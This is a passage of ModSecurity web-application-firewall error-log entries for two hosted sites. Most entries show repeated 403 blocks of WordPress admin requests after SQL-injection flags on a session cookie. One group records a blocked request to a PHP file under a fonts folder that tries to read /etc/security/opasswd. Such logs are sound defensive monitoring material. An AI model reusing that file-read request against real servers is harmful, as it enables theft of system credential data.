"agI6DaFW67LJTsgN3jQKUQAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:29.662094 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI6DaFW67LJTsgN3jQKUQAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:30.355521 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6DaFW67LJTsgN3jQKUQAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:30.932826 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI6DqFW67LJTsgN3jQKUwAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:30.933111 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI6DqFW67LJTsgN3jQKUwAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:31.595494 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6DqFW67LJTsgN3jQKUwAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:32.028505 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI6EKFW67LJTsgN3jQKVQAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:32.028788 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI6EKFW67LJTsgN3jQKVQAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:32.659644 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6EKFW67LJTsgN3jQKVQAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:33.160640 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI6EaFW67LJTsgN3jQKVwAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:33.160922 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI6EaFW67LJTsgN3jQKVwAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:33.704538 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6EaFW67LJTsgN3jQKVwAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:33.934191 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI6EaFW67LJTsgN3jQKWQAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:33.934481 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI6EaFW67LJTsgN3jQKWQAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:34.529726 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6EaFW67LJTsgN3jQKWQAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:35.347652 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI6E6FW67LJTsgN3jQKWwAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:35.347934 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI6E6FW67LJTsgN3jQKWwAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:35.716416 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6E6FW67LJTsgN3jQKWwAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:36.749835 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI6FKFW67LJTsgN3jQKXgAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:36.750127 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI6FKFW67LJTsgN3jQKXgAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:37.428674 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6FKFW67LJTsgN3jQKXgAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:37.813888 2026] [security2:error] [pid 1606352:tid 1606429] [client 216.73.216.110:19405] ModSecurity: Warning. Matched phrase "etc/security/opasswd" at ARGS:filesrc. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: etc/security/opasswd found within ARGS:filesrc: /etc/security/opasswd"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agI6FXo_DFxNSZVmaX3NfgAAAMo"]
[Mon May 11 22:20:37.814697 2026] [security2:error] [pid 1606352:tid 1606429] [client 216.73.216.110:19405] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agI6FXo_DFxNSZVmaX3NfgAAAMo"]
[Mon May 11 22:20:37.911321 2026] [security2:error] [pid 1606352:tid 1606429] [client 216.73.216.110:19405] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agI6FXo_DFxNSZVmaX3NfgAAAMo"]
[Mon May 11 22:20:38.040285 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI6FqFW67LJTsgN3jQKYAAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:38.040666 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI6FqFW67LJTsgN3jQKYAAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:38.671365 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6FqFW67LJTsgN3jQKYAAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:39.325143 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI6F6FW67LJTsgN3jQKZAAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:39.325445 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI6F6FW67LJTsgN3jQKZAAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:39.958142 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6F6FW67LJTsgN3jQKZAAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:40.539672 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI6GKFW67LJTsgN3jQKZgAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:40.539961 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI6GKFW67LJTsgN3jQKZgAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:41.088665 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6GKFW67LJTsgN3jQKZgAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:41.751944 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI6GaFW67LJTsgN3jQKaQAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:41.752303 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI6GaFW67LJTsgN3jQKaQAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:42.440957 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6GaFW67LJTsgN3jQKaQAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:42.645460 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI6GqFW67LJTsgN3jQKagAAAAg"], referer: https://rentparadise.fr/wp-login.php
